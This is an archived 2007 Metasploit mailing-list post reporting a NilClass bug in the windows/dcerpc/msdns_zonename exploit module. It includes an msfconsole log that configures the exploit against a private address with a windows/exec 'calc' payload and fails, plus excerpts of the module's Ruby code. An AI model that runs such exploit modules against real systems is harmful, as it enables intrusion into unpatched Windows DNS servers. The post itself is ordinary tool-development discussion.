Metasploit mailing list archives
BUG: in windows/dcerpc/msdns_zonename (NilClass)
From: kristian.hermansen at gmail.com (Kristian Hermansen)
Date: Mon, 25 Jun 2007 21:46:03 -0400
I tried hacking around a fixing this one today, but looks like it is a Ruby bug that never got worked around in MSF 3.0 for some reason? Trace below... administrator at khermans-um64:~/exploits/trunk$ svn up At revision 5000. administrator at khermans-um64:~/exploits/trunk$ ./msfconsole 888 888 d8b888 888 888 Y8P888 888 888 888 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888 =[ msf v3.1-dev + -- --=[ 200 exploits - 106 payloads + -- --=[ 17 encoders - 5 nops =[ 38 aux msf > use windows/dcerpc/msdns_zonename msf exploit(msdns_zonename) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- Locale English yes Locale for automatic target (English, French, Italian, ...) RHOST yes The target address RPORT 0 yes The target port Exploit target: Id Name -- ---- 0 Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2) msf exploit(msdns_zonename) > set RHOST 172.31.4.14 RHOST => 172.31.4.14 msf exploit(msdns_zonename) > set RPORT 53 RPORT => 53 msf exploit(msdns_zonename) > show targets Exploit targets: Id Name -- ---- 0 Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2) 1 Windows 2000 Server SP0-SP4+ English 2 Windows 2000 Server SP0-SP4+ Italian 3 Windows 2000 Server SP0-SP4+ French 4 Windows 2003 Server SP0 English 5 Windows 2003 Server SP0 French 6 Windows 2003 Server SP1-SP2 English 7 Windows 2003 Server SP1-SP2 French 8 Windows 2003 Server SP1-SP2 Italian 9 Windows 2003 Server SP1-SP2 German msf exploit(msdns_zonename) > set TARGET 6 TARGET => 6 msf exploit(msdns_zonename) > set PAYLOAD windows/exec PAYLOAD => windows/exec msf exploit(msdns_zonename) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- Locale English yes Locale for automatic target (English, French, Italian, ...) RHOST 172.31.4.14 yes The target address RPORT 53 yes The target port Payload options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD yes The command string to execute EXITFUNC thread yes Exit technique: seh, thread, process Exploit target: Id Name -- ---- 6 Windows 2003 Server SP1-SP2 English msf exploit(msdns_zonename) > set CMD calc CMD => calc msf exploit(msdns_zonename) > exploit [-] Exploit failed: undefined method `name' for nil:NilClass msf exploit(msdns_zonename) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- Locale English yes Locale for automatic target (English, French, Italian, ...) RHOST 172.31.4.14 yes The target address RPORT 53 yes The target port Payload options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD calc yes The command string to execute EXITFUNC thread yes Exit technique: seh, thread, process Exploit target: Id Name -- ---- 6 Windows 2003 Server SP1-SP2 English Relevant lines are 93 and 110. For some reason, targets does not get set properly and remains nil. Then, when referencing the 'name' attribute, we raise an exception from ruby... <snip> def gettarget(os) targets.each do |target| if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{dat\ astore['Locale']}/)) return target end end return nil end </snip> <snip> def exploit # Ask the endpoint mapper to locate the port for us dport = datastore['RPORT'].to_i if ((dport != 0) && (target.name =~ /Automatic/)) print_status("Could not use automatic target when the r\ emote port is given"); return end </snip> I found this from hdm a while back... http://www.meatsploit.com/archive/framework/msg02280.html Any ideas? I would patch it, but not really a Ruby dude at the moment. Heh, OK, I'll jump on the ruby wagon soon I suppose. FWIW, if I place a return call before references to name, the exploit returns cleanly. I don't know MSF3 base well enough to know the coding practices and/or the effect it would have for my simple hack to set target correctly when not using automatic target selection... -- Kristian Hermansen
Current thread:
- BUG: in windows/dcerpc/msdns_zonename (NilClass) Kristian Hermansen (Jun 25)
- BUG: in windows/dcerpc/msdns_zonename (NilClass) M.P.Sairam (Jun 25)